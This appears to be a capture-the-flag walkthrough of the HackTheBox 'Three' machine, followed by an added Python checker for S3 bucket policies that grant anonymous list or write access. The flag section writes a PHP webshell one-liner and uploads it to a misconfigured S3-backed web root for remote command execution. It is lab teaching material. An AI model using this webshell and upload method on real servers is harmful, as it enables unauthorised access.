HTB Three

2023/9/24 Penetration Testing HackTheBox

Preface

Tier 1: Three

Using the AWS CLI

With this, the free Tier 1 machines are complete

Task1

How many TCP ports are open?

A:2

Start the scan

nmap -A 10.129.141.55

Two ports are open: 22 and 80


Task2

What is the domain of the email address provided in the "Contact" section of the website?

A:thetoppers.htb

Visit the website and look at the Contact section


Task3

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

A:/etc/hosts

Write the domain name into hosts so that we can reach the site

echo "10.129.141.55 thetoppers.htb" >> /etc/hosts

Task4

Which sub-domain is discovered during further enumeration?

A:s3.thetoppers.htb

Brute-force the subdomains

gobuster vhost -u http://thetoppers.htb/ -w /usr/share/wordlists/dirb/big.txt --append-domain

There is one entry with a 404; that is the one


Task5

Which service is running on the discovered sub-domain?

A:amazon s3

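Add the s3 subdomain found above to the hosts file and visit it (I restarted the target machine here, so the IP changed)

The most painful part: the server's s3 subdomain is extremely unstable and returns 502. I waited several tens of minutes here before I could connect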


Task6

Which command line utility can be used to interact with the service running on the discovered sub-domain?

A:awscli


Task7

Which command is used to set up the AWS CLI installation?

A:aws configure

If aws throws an error here, update pyopenssl with pip

Install aws

apt install awscli -y

Then configure it

aws configure


Task8

What is the command used by the above utility to list all of the S3 buckets?

A:aws s3 ls


Task9

This server is configured to run files written in what web scripting language?

A:php


Submit Flag

Use the command below to connect to s3.thetoppers.htb through the specified S3 endpoint, then list the objects in the thetoppers.htb bucket

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

Next we write a webshell locally

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Upload the webshell

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

Then request the webshell to get a shell
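The upload above worked because the bucket behind the web root accepted list and write requests from this client. As an added example (not from the original post), this Python check flags bucket-policy statements that grant list or write access to every caller. Both policy documents, the Sid values and the deploy role ARN are constructed for illustration; the lab's real configuration is not shown on this page.

```python
import json
from fnmatch import fnmatchcase

# Actions that let any caller enumerate or change what the web server serves.
RISKY_ACTIONS = ("s3:ListBucket", "s3:PutObject", "s3:DeleteObject")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_anonymous(principal):
    """True when the Principal element matches every caller."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False

def anonymous_grants(policy_json):
    """Return sorted (sid, action) pairs that an unconditioned Allow gives to everyone.
    NotAction/NotPrincipal and conditioned statements are out of scope here."""
    findings = set()
    statements = _as_list(json.loads(policy_json).get("Statement", []))
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        if not _is_anonymous(stmt.get("Principal")):
            continue
        # IAM action names are case-insensitive and may contain * and ? wildcards.
        patterns = [p.lower() for p in _as_list(stmt.get("Action", []))]
        for action in RISKY_ACTIONS:
            if any(fnmatchcase(action.lower(), p) for p in patterns):
                findings.add((stmt.get("Sid", f"statement-{i}"), action))
    return sorted(findings)

# Constructed policies for illustration; not the lab's actual configuration.
WEAK_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicWebroot", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject", "s3:ListBucket", "s3:Put*"],
     "Resource": ["arn:aws:s3:::thetoppers.htb", "arn:aws:s3:::thetoppers.htb/*"]}]})
HARDENED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thetoppers.htb/*"},
    {"Sid": "DeployWrite", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111122223333:role/deploy"},  # placeholder role
     "Action": ["s3:PutObject", "s3:DeleteObject"],
     "Resource": "arn:aws:s3:::thetoppers.htb/*"}]})

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, anonymous_grants(policy))
```

A bucket that doubles as a PHP web root should report no findings here: public read at most, with writes limited to a named deployment principal.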